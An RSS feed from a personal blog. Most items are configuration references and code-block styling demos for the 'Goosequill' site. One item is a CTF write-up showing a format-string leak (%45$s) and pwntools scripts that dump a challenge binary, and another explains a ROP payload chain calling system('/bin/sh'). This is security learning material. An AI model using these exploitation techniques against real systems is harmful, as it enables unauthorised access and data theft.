<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Vesper Vei</title><description>Personal notes, writings, and experiments by Vesper Vei.</description><link>https://goosequill.erina.top/</link><item><title>Goosequill Comments Configuration Reference</title><link>https://goosequill.erina.top/en/blog/comments-reference/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/comments-reference/</guid><description>A compact reference for Goosequill comment system configuration, covering both Giscus and Waline options.</description><pubDate>Wed, 22 Apr 2026 16:00:00 GMT</pubDate><content:encoded>Goosequill currently supports two comment providers through `siteConfig.comments`:

- `giscus`
- `waline`

You should configure exactly one provider at a time.

## Config shape

Set `comments` in `src/config.ts`:

```ts
comments: {
  provider: &quot;giscus&quot; | &quot;waline&quot;,
}
```

## Giscus

### Minimal example

```ts
comments: {
  provider: &quot;giscus&quot;,
  repo: &quot;owner/repo&quot;,
  repoId: &quot;R_kgDOExample&quot;,
  category: &quot;Announcements&quot;,
  categoryId: &quot;DIC_kwDOExample&quot;,
}
```

### Parameters

| Parameter | Type | Required | Default | Description |
| --- | --- | --- | --- | --- |
| `provider` | `&quot;giscus&quot;` | yes | — | Selects Giscus |
| `repo` | `string` | yes | — | GitHub repo in `owner/name` form |
| `repoId` | `string` | yes | — | Giscus repository ID |
| `category` | `string` | yes | — | GitHub Discussions category name |
| `categoryId` | `string` | yes | — | GitHub Discussions category ID |
| `mapping` | `&quot;pathname&quot; \| &quot;url&quot; \| &quot;title&quot; \| &quot;og:title&quot; \| &quot;specific&quot; \| &quot;number&quot;` | no | `&quot;pathname&quot;` | How pages map to discussion threads |
| `strict` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;0&quot;` | Whether mapping must match strictly |
| `reactionsEnabled` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;1&quot;` | Enables reactions in the comments UI |
| `emitMetadata` | `&quot;0&quot; \| &quot;1&quot;` | no | `&quot;0&quot;` | Emits discussion metadata into the page |
| `inputPosition` | `&quot;top&quot; \| &quot;bottom&quot;` | no | `&quot;top&quot;` | Composer position |
| `theme` | `string` | no | fallback only | Shared theme fallback for both light and dark |
| `theme_light` | `string` | no | `&quot;light&quot;` | Giscus theme used in light mode |
| `theme_dark` | `string` | no | `&quot;dark&quot;` | Giscus theme used in dark mode |
| `lang` | `string` | no | `&quot;en&quot;` | Giscus UI language |
| `loading` | `&quot;lazy&quot; \| &quot;eager&quot;` | no | `&quot;lazy&quot;` | Script loading strategy |

### Notes

- `repo`, `repoId`, `category`, and `categoryId` are the hard requirements in Goosequill.
- Goosequill syncs Giscus theme with the site `data-theme` state and system color scheme.
- If `theme_light` or `theme_dark` is omitted, Goosequill falls back to `theme`, then to `light` or `dark`.

## Waline .

### Minimal example

```ts
comments: {
  provider: &quot;waline&quot;,
  serverURL: &quot;https://your-waline-server.example.com&quot;,
}
```

### Parameters

| Parameter | Type | Required | Default | Description |
| --- | --- | --- | --- | --- |
| `provider` | `&quot;waline&quot;` | yes | — | Selects Waline |
| `serverURL` | `string` | yes | — | Waline server endpoint |
| `lang` | `&quot;zh&quot; \| &quot;zh-CN&quot; \| &quot;zh-TW&quot; \| &quot;en&quot; \| &quot;en-US&quot; \| &quot;jp&quot; \| &quot;jp-JP&quot; \| &quot;pt-BR&quot; \| &quot;ru&quot; \| &quot;ru-RU&quot; \| &quot;fr-FR&quot; \| &quot;fr&quot; \| &quot;vi&quot; \| &quot;vi-vn&quot; \| &quot;es&quot; \| &quot;es-MX&quot;` | no | `&quot;en&quot;` | Waline UI language |
| `emoji` | `string[] \| false` | no | `false` | Emoji source list, or disable emojis |
| `meta` | `(&quot;nick&quot; \| &quot;mail&quot; \| &quot;link&quot;)[]` | no | `[&quot;nick&quot;, &quot;mail&quot;, &quot;link&quot;]` | Input fields shown in the form |
| `requiredMeta` | `(&quot;nick&quot; \| &quot;mail&quot; \| &quot;link&quot;)[]` | no | `[]` | Fields that become required |
| `login` | `&quot;enable&quot; \| &quot;disable&quot; \| &quot;force&quot;` | no | `&quot;enable&quot;` | Login mode |
| `wordLimit` | `number \| [number, number]` | no | `0` | Text length limit |
| `pageSize` | `number` | no | `10` | Comments per page |
| `search` | `boolean` | no | `false` | Enables admin search in the panel |
| `reaction` | `boolean \| string[]` | no | `false` | Enables reactions or provides custom reaction images |
| `pageview` | `boolean` | no | `false` | Enables pageview counter |
| `noCopyright` | `boolean` | no | `false` | Hides Waline copyright |
| `noRss` | `boolean` | no | `false` | Disables RSS entry output |

### Notes

- Goosequill currently keys Waline threads by `window.location.pathname`.
- The site theme is converted to a Waline `dark` boolean and updated when theme mode changes.
- `serverURL` is the only hard requirement besides `provider`.

## Recommended starting point

If you want the smallest working configuration:

- Use Giscus when your content and identity already live around GitHub Discussions.
- Use Waline when you want a self-hosted backend and more form-level controls.</content:encoded></item><item><title>Goosequill Shortcodes Reference</title><link>https://goosequill.erina.top/en/blog/shortcodes-reference/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/shortcodes-reference/</guid><description>A complete reference for Goosequill built-in shortcodes, including purposes, props, defaults, and usage examples.</description><pubDate>Sun, 19 Apr 2026 16:00:00 GMT</pubDate><content:encoded>Currently available shortcodes:

- `Alert`
- `ImageCode`
- `Video`
- `Youtube`
- `Bilibili`
- `Steam`
- `Spotify`
- `CRT`

## How to use them

In MDX, these components are already injected through `ExtendMarkdown.astro`, so you can write them directly like this:

```mdx
&lt;Alert type=&quot;note&quot;&gt;Hello&lt;/Alert&gt;
```

No extra import is required.

## 1. `Alert`

Renders a GitHub-style alert block.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `type` | `&apos;note&apos; \| &apos;tip&apos; \| &apos;important&apos; \| &apos;warning&apos; \| &apos;caution&apos;` | `&apos;note&apos;` | Alert style |

### Example

```mdx
&lt;Alert type=&quot;note&quot;&gt;
This is a note.
&lt;/Alert&gt;

&lt;Alert type=&quot;warning&quot;&gt;
This is a warning.
&lt;/Alert&gt;
```

### Notes

- Content is passed through the default slot.
- If `type` is omitted, `note` is used.

## 2. `ImageCode`

Renders an image with a set of combinable style classes.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `url` | `string` | — | Original image URL, required |
| `url_min` | `string` | `undefined` | Preview/compressed image URL; when provided, the preview is shown and links to `url` |
| `alt` | `string` | `&apos;&apos;` | Alt text |
| `full` | `boolean` | `false` | Makes the image fill the content width |
| `full_bleed` | `boolean` | `false` | Lets the image extend beyond the content column |
| `start` | `boolean` | `false` | Floats the image to the start side |
| `end` | `boolean` | `false` | Floats the image to the end side |
| `pixels` | `boolean` | `false` | Uses pixel-art style rendering |
| `transparent` | `boolean` | `false` | Better suited for transparent images |
| `no_hover` | `boolean` | `false` | Disables hover zoom |
| `spoiler` | `boolean` | `false` | Applies spoiler masking |
| `solid` | `boolean` | `false` | Stronger spoiler masking, used with `spoiler` |

### Example

```mdx
&lt;ImageCode
  url=&quot;/images/example.png&quot;
  alt=&quot;Example image&quot;
  no_hover=&quot;true&quot;
/&gt;

&lt;ImageCode
  url=&quot;/images/original.png&quot;
  url_min=&quot;/images/preview.png&quot;
  alt=&quot;Clickable preview&quot;
  full=&quot;true&quot;
/&gt;
```

### Notes

- `solid` only has an effect when `spoiler` is enabled.
- When `url_min` is present, the component renders a linked preview image pointing to `url`.
- Layout flags like `full`, `full_bleed`, `start`, and `end` are best used intentionally rather than all together.

## 3. `Video`

Renders a local or remote video and supports most of the same presentation classes as `ImageCode`.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `url` | `string` | — | Video URL, required |
| `alt` | `string` | `&apos;&apos;` | Accessibility text used as `aria-label` |
| `full` | `boolean` | `false` | Fills the content width |
| `full_bleed` | `boolean` | `false` | Wider presentation |
| `start` | `boolean` | `false` | Floats to the start side |
| `end` | `boolean` | `false` | Floats to the end side |
| `pixels` | `boolean` | `false` | Pixel-art rendering style |
| `transparent` | `boolean` | `false` | Transparent presentation style |
| `spoiler` | `boolean` | `false` | Spoiler masking |
| `solid` | `boolean` | `false` | Stronger masking when used with `spoiler` |
| `autoplay` | `boolean` | `false` | Autoplays the video |
| `controls` | `boolean` | `false` | Shows native controls |
| `loop` | `boolean` | `false` | Loops playback |
| `muted` | `boolean` | `false` | Starts muted |
| `playsinline` | `boolean` | `false` | Requests inline playback |

### Example

```mdx
&lt;Video
  url=&quot;/videos/demo.webm&quot;
  alt=&quot;Demo video&quot;
  controls=&quot;true&quot;
/&gt;

&lt;Video
  url=&quot;/videos/hero.webm&quot;
  full_bleed=&quot;true&quot;
  autoplay=&quot;true&quot;
  muted=&quot;true&quot;
  loop=&quot;true&quot;
  playsinline=&quot;true&quot;
/&gt;
```

### Notes

- The component passes `url` directly to `&lt;video src&gt;` and does not infer formats.
- `solid` only matters when `spoiler` is enabled.
- Unlike `ImageCode`, `Video` does not support `url_min` or `no_hover`.

## 4. `Youtube`

Embeds a YouTube video using the `youtube-nocookie.com` domain.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `id` | `string` | — | YouTube video ID, required |
| `autoplay` | `boolean` | `false` | Whether to autoplay |
| `start` | `number` | `undefined` | Start time in seconds |

### Example

```mdx
&lt;Youtube id=&quot;0Da8ZhKcNKQ&quot; /&gt;

&lt;Youtube id=&quot;0Da8ZhKcNKQ&quot; autoplay=&quot;true&quot; start={30} /&gt;
```

### Notes

- The embed URL format is `https://www.youtube-nocookie.com/embed/&lt;id&gt;`.
- Query parameters are only appended when corresponding props are provided.

## 5. `Bilibili`

Embeds the Bilibili player.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `bvid` | `string` | `undefined` | BV ID |
| `aid` | `string` | `undefined` | AV ID |
| `cid` | `string` | `undefined` | Resource / danmaku ID |
| `page` | `number` | `1` | Part number |
| `autoplay` | `boolean` | `false` | Whether to autoplay |

### Example

```mdx
&lt;Bilibili bvid=&quot;BV1yt4y1Q7SS&quot; /&gt;

&lt;Bilibili
  bvid=&quot;BV1yt4y1Q7SS&quot;
  page={2}
  autoplay=&quot;true&quot;
/&gt;
```

### Notes

- The component builds a URL like `//player.bilibili.com/player.html?...`.
- It always appends `isOutside=true`.
- All ID props are technically optional, but in practice you should usually provide at least `bvid` or `aid`.

## 6. `Spotify`

Embeds Spotify content such as albums, playlists, tracks, shows, and episodes.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `type` | `&apos;track&apos; \| &apos;album&apos; \| &apos;artist&apos; \| &apos;playlist&apos; \| &apos;episode&apos; \| &apos;show&apos;` | `undefined` | Generic type form |
| `id` | `string` | `undefined` | Content ID used with `type` |
| `track` | `string` | `undefined` | Track ID shorthand |
| `album` | `string` | `undefined` | Album ID shorthand |
| `artist` | `string` | `undefined` | Artist ID shorthand |
| `playlist` | `string` | `undefined` | Playlist ID shorthand |
| `episode` | `string` | `undefined` | Episode ID shorthand |
| `show` | `string` | `undefined` | Show ID shorthand |
| `height` | `string \| number` | auto | Custom iframe height |

### Example

```mdx
&lt;Spotify album=&quot;5gDJVilnZpPt8zwBC467UH&quot; /&gt;

&lt;Spotify type=&quot;track&quot; id=&quot;11dFghVXANMlKmJXsNCbNl&quot; /&gt;

&lt;Spotify playlist=&quot;37i9dQZF1DXcBWIGoYBM5M&quot; height={480} /&gt;
```

### Notes

- You can pass props in two ways:
  - shorthand: `album=&quot;...&quot;`, `track=&quot;...&quot;`, etc.
  - generic: `type=&quot;album&quot; id=&quot;...&quot;`
- If both are present, shorthand props take priority.
- If neither shorthand props nor a valid `type + id` pair is provided, the component throws an error.
- Default height:
  - `track` → `152`
  - all other types → `352`

## 7. `Steam`

Displays a Steam store card.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `appid` | `string \| number` | — | Steam App ID, required |
| `variant` | `&apos;horizontal&apos; \| &apos;vertical&apos;` | `&apos;horizontal&apos;` | Card layout |

### Example

```mdx
&lt;Steam appid=&quot;1127400&quot; /&gt;

&lt;Steam appid=&quot;730&quot; variant=&quot;vertical&quot; /&gt;
```

### Notes

- The component builds:
  - Store URL: `https://store.steampowered.com/app/&lt;appid&gt;/`
  - Horizontal image: `header.jpg`
  - Vertical image: `library_600x900_2x.jpg`
- In `vertical` mode, the media container gets a fixed width of `200px`.
- It does not call the Steam API; it only constructs URLs from the given `appid`.

## 8. `CRT`

Renders a CRT-styled code container.

### Props

| Prop | Type | Default | Description |
| --- | --- | --- | --- |
| `code` | `string` | — | Code text to display, required |
| `no_scanlines` | `boolean` | `false` | Disables scanline effect |

### Example

```mdx
&lt;CRT code={`
Hello, CRT
`} /&gt;

&lt;CRT
  no_scanlines=&quot;true&quot;
  code={`
No scanlines here
`}
/&gt;
```

### Notes

- If `code` starts with a newline, the component strips that first newline for cleaner multiline template usage.
- When `no_scanlines` is `false`, the component also adds the `scanlines` class.

## Practical suggestions

### Media

- Need a preview image that links to the original: use `ImageCode` with `url_min`
- Need spoiler masking: use `spoiler`, and add `solid` for a stronger effect
- Need a full-width image inside the content column: use `full`
- Need content that breaks beyond the column: use `full_bleed`

### Embeds

- YouTube: pass `id`
- Bilibili: prefer `bvid`
- Spotify: prefer shorthand props like `album=&quot;...&quot;`
- Steam: pass `appid`, then choose `variant` based on layout needs

### Alerts and presentation

- Use `Alert` for callouts
- Use `CRT` for retro terminal-styled code
- Use normal Markdown code fences for regular syntax-highlighted code unless you specifically want the CRT look</content:encoded></item><item><title>[polarisctf] ez-nc</title><link>https://goosequill.erina.top/en/blog/202604062330/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202604062330/</guid><description>Import notes for [polarisctf] ez-nc</description><pubDate>Mon, 06 Apr 2026 15:30:00 GMT</pubDate><content:encoded>&gt; [!note]
&gt; Related entry: [[PWN题目索引]]
## Challenge Summary

&gt; [!info] Basic Information
&gt; - **Competition**: polarisctf
&gt; - **Challenge**: ez-nc
&gt; - **Difficulty**: ★★★☆☆
&gt; - **Architecture**: amd64
&gt; - **libc / Environment**: To be added
&gt; - **Protection Mechanisms**: NX

&gt; [!abstract] One-line attack chain
&gt; BROP + format string vulnerability -&gt; use %n\$p to probe stack space -&gt; use %n\$s to leak the ELF file and save it -&gt; reverse engineer with IDA

## Program Profile and Attack Surface
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091038626.png)

### Program Function Overview
The challenge did not provide any files. After starting the container and connecting with nc, `Enter the filename to download:` appeared, but actual testing showed that the `download` functionality does not exist; it only prints file contents.
At the same time, filtering protection was applied to the target file `ez-nc`.

### Initial Attack Surface Screening
Since there is string interaction, I tried a format string vulnerability. With `%p` I probed a stack address, and there was also an input length limit (len_max=7), so I initially suspected the program used `fnprintf()`.
Next, stack address probing will be performed with BROP.
## Pre-exploitation Constraints
### Key Constraints
- Which protection mechanisms currently have a real impact on exploitation?
- What are the limits on input length, number of interactions, character set, alignment, stack balance, etc.?
- Which constraints must be solved first, and which are only implementation details?
At present, only string filtering protection and the input length limit have been found, so conventional long input is not suitable: `%1$p.%2$p.%3$p.%4$p....`. Instead, a new form using a for loop to construct `f&quot;%{i}$p` is adopted.
## Primitive Extraction

&gt; [!note]
&gt; This section explains how the vulnerability is transformed into reusable primitives.
### Leak Capability and Acquisition of Critical Information
#### Leak Results and Critical Information
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091055664.png)
We performed `%p` pointer probing on `1~50` and obtained some stack addresses. These stack spaces store local variable data (if the probed address is high enough, binary file information can be obtained!)
exp --&gt; [[#路线一]]
#### Support for Subsequent Exploitation
Next, `%n$s` string probing is performed to obtain the actual information in stack space. But note that if the passed address does not hit a string, the program will crash **(Segfault)**, so reconnection logic must be written properly.
Crash and reconnect:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091101100.png)
Successful hit:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091103871.png)


## Route Selection
When solving this challenge, I sent the result of Index 45 to AI, and the AI found the flag among a large number of bytes. But later, when reading other experts&apos; writeups, I found that the result of Index 45 could also be saved as a binary file and reverse engineered in IDA, where the flag was found in the `.rodata` field.
So this note records both routes.

## Attack Chain Breakdown

### Route 1: Blind String Extraction
Directly perform `%n$s` blind extraction on 1~50:
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091107665.png)
The flag is hidden in these returned bytes, but manual filtering is too difficult and it is easy to miss it by eye.
(There are still 2 more pages below, too long to show.)

### Route 2: Download and Reverse Engineer with IDA
From the screenshot above, you can see that there is a file header `ELF` string! This indicates that what is stored at Index 45 is a binary file string, for example, an ELF file like `ez-nc`. This stack address `0x7fffbdac7e10` -&gt; the address of the `.data` segment. This address stores the string `ez-nc`. The program places this string into the first argument of `fnprintf()`, thereby bypassing the program&apos;s filtering of the string `ez-nc`!
A script can be written to download this binary file --&gt; [[#路线二：]]
&gt;[!tip] 
&gt;I used the writeup author&apos;s script here, but the downloaded ELF file cannot be directly reverse engineered in IDA! [[#踩坑记录]] will explain this later.


Load it into IDA for analysis:
![longshot20260409185707.jpg](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091857289.jpg)
The program performs a blacklist check with strstr(s, &quot;ez-nc&quot;), but then calls snprintf(filename, 0x58u, s), directly using user input as the format string, resulting in a format string vulnerability.  
By inputting %45$s (where the 45th offset on the stack happens to be argv\[0], i.e. the program name ez-nc), the string blacklist check can be bypassed, causing filename to be formatted as ez-nc, thereby triggering arbitrary file reading and downloading the program binary itself.
ps: I don&apos;t know why the downloaded binary had issues; the symbol table was not located
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091902123.png)
It was discovered that the flag was directly hardcoded in the `.rodata` data section of the ELF file.
![image.png](https://chenhun.oss-cn-beijing.aliyuncs.com/photo/202604091903776.png)


## Pitfalls and Stability

### Pitfall Notes
Fill in here why the initial ELF could not be reverse engineered properly in IDA:
### Pitfall Notes and Stability Fixes

#### Where It First Went Wrong
- At which step did the first version of the exploit fail earliest?
- At the time, did the error look like an offset issue, a stack balance issue, or an environment issue?
- Why was this error not easy to realize at first?

#### Root Cause Identification
- What was the final confirmed root cause?
- Was it a local/remote difference, a symbol calculation error, gadget contamination, or an interaction timing issue?
- Which debugging evidence really helped you pinpoint the issue?

#### Stable Version Fixes
- Compared with the initial version, what were the most critical fixes in the final version?
- Which fixes merely made it &quot;work,&quot; and which truly made it &quot;stable&quot;?
- If you encounter a similar pitfall again in the future, what should you check first?


## Pattern Transfer

### Pattern Recognition
- What is the most critical recognition signal in this challenge?
- Which local phenomenon is most worth becoming immediately alert to next time when solving a challenge?

### Reuse Through Transfer
- Next time you see what kind of structure, you should prioritize thinking of this route?
- What kind of reusable exploitation template can be distilled from this challenge?

### Pattern Recognition and Transfer

#### Recognition Signals
- What structural signal in this challenge is most worth remembering?
- Is it a certain input model, a certain heap state, a certain leak method, or a certain convergence pattern?
- When these signals appear together, why should this route be prioritized?

#### Transfer Pattern
- What kind of reusable pattern can this challenge ultimately be abstracted into?
- If it is changed into a similar challenge with different details, which parts can be reused directly and which parts must be rebuilt?
- Next time you encounter a similar challenge, which three points should be verified first?


## exp Summary:
### Route 1
```python
def create_conn() -&gt; remote:
    return remote(&quot;nc1.ctfplus.cn&quot;, 15894)


def interact_copy(io: remote | process, payload: bytes) -&gt; bytes | None:
    context.timeout = 0.5
    try:
        io.recvuntil(b&quot;Enter the filename to download:&quot;)
        io.sendline(payload)
        res = io.recvuntil(b&quot; not existed&quot;, drop=True)
        return res
    except Exception:
        return None
# BlindFmtTool是我自己写的工具类，具有重连功能，可以在我的github上找到“my_tool.py”
brop = BlindFmtTool(create_conn, interact_copy)
# 栈空间探测封装：
brop.dump_stack_ptrs()
# 字符串盲注封装：
brop.dump_strings()
```

### Route 2:
exp for downloading the Index 45 ELF file:
```python
from pwn import *
context.log_level = &quot;error&quot;
def download():
    host = &quot;nc1.ctfplus.cn&quot;
    port = 32441
    io = remote(host, port)
    io.recvuntil(b&quot;download: &quot;)
    io.sendline(b&quot;%45$s&quot;)
    data = io.recvall(timeout=3)
    if b&quot;ELF&quot; in data:
        with open(&quot;ez-nc&quot;, &quot;wb&quot;) as f:
            f.write(data)
if __name__ == &quot;__main__&quot;:
    download()
```</content:encoded></item><item><title>Expressive Code Example</title><link>https://goosequill.erina.top/en/blog/expressive-code/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/expressive-code/</guid><description>How code blocks look in Markdown using Expressive Code.</description><pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate><content:encoded>Here, we&apos;ll explore how code blocks look using [Expressive Code](https://expressive-code.com/). The provided examples are based on the official documentation, which you can refer to for further details.

## Expressive Code

### Syntax Highlighting

[Syntax Highlighting](https://expressive-code.com/key-features/syntax-highlighting/)

#### Regular syntax highlighting

```js
console.log(&apos;This code is syntax highlighted!&apos;)
```

#### Rendering ANSI escape sequences

```ansi
ANSI colors:
- Regular: Red Green Yellow Blue Magenta Cyan
- Bold:    Red Green Yellow Blue Magenta Cyan
- Dimmed:  Red Green Yellow Blue Magenta Cyan

256 colors (showing colors 160-177):
160 161 162 163 164 165
166 167 168 169 170 171
172 173 174 175 176 177

Full RGB colors:
ForestGreen - RGB(34, 139, 34)

Text formatting: Bold Dimmed Italic Underline
```

### Editor &amp; Terminal Frames

[Editor &amp; Terminal Frames](https://expressive-code.com/key-features/frames/)

#### Code editor frames

```js title=&quot;my-test-file.js&quot;
console.log(&apos;Title attribute example&apos;)
```

---

```html
&lt;!-- src/content/index.html --&gt;
&lt;div&gt;File name comment example&lt;/div&gt;
```

#### Terminal frames

```bash
echo &quot;This terminal frame has no title&quot;
```

---

```powershell title=&quot;PowerShell terminal example&quot;
Write-Output &quot;This one has a title!&quot;
```

#### Overriding frame types

```sh frame=&quot;none&quot;
echo &quot;Look ma, no frame!&quot;
```

---

```ps frame=&quot;code&quot; title=&quot;PowerShell Profile.ps1&quot;
# Without overriding, this would be a terminal frame
function Watch-Tail { Get-Content -Tail 20 -Wait $args }
New-Alias tail Watch-Tail
```

### Text &amp; Line Markers

[Text &amp; Line Markers](https://expressive-code.com/key-features/text-markers/)

#### Marking full lines &amp; line ranges

```js {1, 4, 7-8}
// Line 1 - targeted by line number
// Line 2
// Line 3
// Line 4 - targeted by line number
// Line 5
// Line 6
// Line 7 - targeted by range &quot;7-8&quot;
// Line 8 - targeted by range &quot;7-8&quot;
```

#### Selecting line marker types (mark, ins, del)

```js title=&quot;line-markers.js&quot; del={2} ins={3-4} {6}
function demo() {
  console.log(&apos;this line is marked as deleted&apos;)
  // This line and the next one are marked as inserted
  console.log(&apos;this is the second inserted line&apos;)

  return &apos;this line uses the neutral default marker type&apos;
}
```

#### Adding labels to line markers

```jsx {&quot;1&quot;:5} del={&quot;2&quot;:7-8} ins={&quot;3&quot;:10-12}
// labeled-line-markers.jsx
&lt;button
  role=&quot;button&quot;
  {...props}
  value={value}
  className={buttonClassName}
  disabled={disabled}
  active={active}
&gt;
  {children &amp;&amp;
    !active &amp;&amp;
    (typeof children === &apos;string&apos; ? &lt;span&gt;{children}&lt;/span&gt; : children)}
&lt;/button&gt;
```

#### Adding long labels on their own lines

```jsx {&quot;1. Provide the value prop here:&quot;:5-6} del={&quot;2. Remove the disabled and active states:&quot;:8-10} ins={&quot;3. Add this to render the children inside the button:&quot;:12-15}
// labeled-line-markers.jsx
&lt;button
  role=&quot;button&quot;
  {...props}

  value={value}
  className={buttonClassName}

  disabled={disabled}
  active={active}
&gt;

  {children &amp;&amp;
    !active &amp;&amp;
    (typeof children === &apos;string&apos; ? &lt;span&gt;{children}&lt;/span&gt; : children)}
&lt;/button&gt;
```

#### Using diff-like syntax

```diff
+this line will be marked as inserted
-this line will be marked as deleted
this is a regular line
```

---

```diff
--- a/README.md
+++ b/README.md
@@ -1,3 +1,4 @@
+this is an actual diff file
-all contents will remain unmodified
 no whitespace will be removed either
```

#### Combining syntax highlighting with diff-like syntax

```diff lang=&quot;js&quot;
  function thisIsJavaScript() {
    // This entire block gets highlighted as JavaScript,
    // and we can still add diff markers to it!
-   console.log(&apos;Old code to be removed&apos;)
+   console.log(&apos;New and shiny code!&apos;)
  }
```

#### Marking individual text inside lines

```js &quot;given text&quot;
function demo() {
  // Mark any given text inside lines
  return &apos;Multiple matches of the given text are supported&apos;;
}
```

#### Regular expressions

```ts /ye[sp]/
console.log(&apos;The words yes and yep will be marked.&apos;)
```

#### Escaping forward slashes

```sh /\/ho.*\//
echo &quot;Test&quot; &gt; /home/test.txt
```

#### Selecting inline marker types (mark, ins, del)

```js &quot;return true;&quot; ins=&quot;inserted&quot; del=&quot;deleted&quot;
function demo() {
  console.log(&apos;These are inserted and deleted marker types&apos;);
  // The return statement uses the default marker type
  return true;
}
```

### Word Wrap

[Word Wrap](https://expressive-code.com/key-features/word-wrap/)

#### Configuring word wrap per block

```js wrap
// Example with wrap
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

---

```js wrap=false
// Example with wrap=false
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

#### Configuring indentation of wrapped lines

```js wrap preserveIndent
// Example with preserveIndent (enabled by default)
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

---

```js wrap preserveIndent=false
// Example with preserveIndent=false
function getLongString() {
  return &apos;This is a very long string that will most probably not fit into the available space unless the container is extremely wide&apos;
}
```

## Collapsible Sections

[Collapsible Sections](https://expressive-code.com/plugins/collapsible-sections/)

```js collapse={1-5, 12-14, 21-24}
// All this boilerplate setup code will be collapsed
import { someBoilerplateEngine } from &apos;@example/some-boilerplate&apos;
import { evenMoreBoilerplate } from &apos;@example/even-more-boilerplate&apos;

const engine = someBoilerplateEngine(evenMoreBoilerplate())

// This part of the code will be visible by default
engine.doSomething(1, 2, 3, calcFn)

function calcFn() {
  // You can have multiple collapsed sections
  const a = 1
  const b = 2
  const c = a + b

  // This will remain visible
  console.log(`Calculation result: ${a} + ${b} = ${c}`)
  return c
}

// All this code until the end of the block will be collapsed again
engine.closeConnection()
engine.freeMemory()
engine.shutdown({ reason: &apos;End of example boilerplate code&apos; })
```

## Line Numbers

[Line Numbers](https://expressive-code.com/plugins/line-numbers/)

### Displaying line numbers per block

```js showLineNumbers
// This code block will show line numbers
console.log(&apos;Greetings from line 2!&apos;)
console.log(&apos;I am on line 3&apos;)
```

---

```js showLineNumbers=false
// Line numbers are disabled for this block
console.log(&apos;Hello?&apos;)
console.log(&apos;Sorry, do you know what line I am on?&apos;)
```

### Changing the starting line number

```js showLineNumbers startLineNumber=5
console.log(&apos;Greetings from line 5!&apos;)
console.log(&apos;I am on line 6&apos;)
```</content:encoded></item><item><title>16-Byte Alignment</title><link>https://goosequill.erina.top/en/blog/202603051050/</link><guid isPermaLink="true">https://goosequill.erina.top/en/blog/202603051050/</guid><description>Import notes on 16-byte alignment</description><pubDate>Thu, 05 Mar 2026 03:10:00 GMT</pubDate><content:encoded>##  16-Byte Alignment

In the world of Pwn, **16-byte alignment (Stack Alignment)** is absolutely a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when running locally or attacking remotely, the program mysteriously crashes directly with `SIGSEGV` (segmentation fault) inside `system` or `printf`.

It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.

---

### 1. Why does this rule exist? (Hardware’s “OCD”)
This rule comes from the x86-64 **SSE (Streaming SIMD Extensions)** instruction set.
For maximum performance, when the CPU processes 128-bit (16-byte) data (such as floating-point operations), it uses instructions like `movaps` (Move Aligned Packed Single-Precision Floating-Point Values).
- **Unwritten rule**: `movaps` requires the memory address being operated on to **be divisible by 16** (that is, the last hexadecimal digit of the address must be `0`).
- **Consequence**: If the address is not aligned, the CPU will directly refuse to work, throw an exception, and crash the program.
Modern `glibc` functions (such as `printf` and `system`) make heavy use of these instructions internally for optimization.

---

### 2. The “dynamic changes” of 16-byte alignment
This is the part that most easily confuses people. According to the **System V ABI** standard:
&gt; **Before** executing the `call` instruction, the stack pointer `RSP` must be 16-byte aligned.

Let’s track how the stack changes:

1. **Before the call**: `RSP` = `0x...00` (16-byte aligned, address ending in 0).
    
2. **Execute `call`**: The CPU automatically pushes the **return address** (8 bytes) onto the stack.
    
    - At this point, `RSP` becomes `0x...F8` (no longer a multiple of 16, offset by 8 bytes).
        
3. **Enter the function body**: The first instruction of the function is usually `push rbp`.
    
    - At this point, `RSP` becomes `0x...F0` (hey! back to being a multiple of 16).
        

**Conclusion**: While executing logic inside the function body, the compiler assumes by default that `RSP` is aligned. But if you jump directly to the start of the function by special means (such as ROP), the situation is different.

---

### 3. A Pwn player’s nightmare: the alignment pit in a ROP chain

When you build a ROP chain, you are effectively manually “stitching together” return addresses.

**Typical failure case:**

You found the address of `system` and prepared `pop rdi; ret` for argument passing. Your payload looks like this:

`[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]`

In this process, you skip the normal `call` flow and jump directly into `system` via `ret`. If at this moment your `RSP` happens to be sitting at an “awkward” position (for example, ending in `8` instead of `0`), then as soon as `system` executes `movaps` internally, it will crash immediately.

---

### 4. The ultimate remedy: add one more `ret`

If you find that your ROP chain crashes when calling `system`, and debugging shows it dies on `movaps`, the simplest black magic is: **before calling the target function, insert a useless `ret` instruction.**

**Fixed payload:**

`[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]`

- **Principle**: The essence of `ret` is `pop rip`. Executing one extra `ret` moves `RSP` by 8 bytes, achieving a gorgeous transition “from unaligned to aligned.”

---

### 5. How do you identify it while debugging?
In GDB (for example, using the `pwndbg` plugin), when you crash:
